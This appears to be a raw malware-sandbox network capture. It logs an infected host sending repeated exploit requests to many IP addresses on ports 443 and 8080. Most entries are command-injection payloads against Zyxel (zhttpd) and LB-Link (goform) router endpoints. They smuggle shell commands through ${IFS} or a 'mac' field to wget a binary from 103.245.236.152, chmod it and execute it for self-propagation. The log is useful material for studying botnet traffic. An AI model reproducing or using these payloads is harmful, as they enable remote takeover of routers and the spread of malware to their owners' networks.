                                        Jan 14, 2024 16:18:47.527333975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5102192.168.2.135823225.212.56.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527367115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5103192.168.2.1335718137.211.186.244443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527410984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5104192.168.2.1338918217.220.162.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527465105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5105192.168.2.1352576133.94.211.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527498960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5106192.168.2.1358208159.179.116.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527529955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5107192.168.2.135637823.40.161.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527580976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5108192.168.2.133885882.232.42.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527614117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5109192.168.2.1337858176.178.174.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527646065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5110192.168.2.1356376197.162.236.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527707100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5111192.168.2.1358262118.45.178.91443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527740955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5112192.168.2.1344348172.72.84.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527791023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5113192.168.2.1353968182.116.125.239443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527823925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5114192.168.2.1335508138.196.228.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527853966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5115192.168.2.135997895.72.209.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527914047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5116192.168.2.1356352141.102.80.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527951956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5117192.168.2.1336486160.218.76.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.527987957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5118192.168.2.1336440153.40.188.110443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528023005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5119192.168.2.1357242143.88.90.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528048038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5120192.168.2.133278639.222.140.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528100967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5121192.168.2.135629477.86.139.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528127909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5122192.168.2.1339886188.197.255.86443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528167009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5123192.168.2.135251451.251.62.130443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528203964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5124192.168.2.135746873.130.42.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528244972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5125192.168.2.1344406216.253.220.77443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528301954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5126192.168.2.133674827.119.179.102443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528332949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5127192.168.2.134470296.49.40.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528387070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5128192.168.2.1355330185.206.100.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528418064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5129192.168.2.1342518193.128.15.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528440952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5130192.168.2.1347684157.205.112.3443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528486013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5131192.168.2.133968666.211.23.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528538942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5132192.168.2.1360144135.138.51.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528592110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5133192.168.2.133337480.117.159.144443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528620958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5134192.168.2.13435761.188.98.243443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528667927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5135192.168.2.133384046.64.124.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528701067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5136192.168.2.1335948144.166.19.225443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528724909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5137192.168.2.1343796207.8.20.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528791904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5138192.168.2.1338780157.215.243.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528805971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5139192.168.2.1333022170.128.158.61443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:47.528841019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5140192.168.2.135232068.169.58.1478080
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.096801996 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:48.688945055 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:49.360929012 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:50.708919048 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:53.392898083 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                        Jan 14, 2024 16:18:58.768929005 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 35 32 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.152/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5141192.168.2.1345830130.12.38.125443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536305904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5142192.168.2.135849424.178.99.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536339998 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5143192.168.2.133641659.165.200.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536364079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5144192.168.2.1360456146.117.103.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536398888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5145192.168.2.1339810184.163.104.38443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536439896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5146192.168.2.133836285.57.173.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536487103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5147192.168.2.1351174213.3.130.4443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536535978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5148192.168.2.1360184176.251.40.20443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536577940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5149192.168.2.1356140148.241.149.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:48.536607981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        5150192.168.2.134295442.132.117.154443
                                        TimestampBytes transferredDirectionData
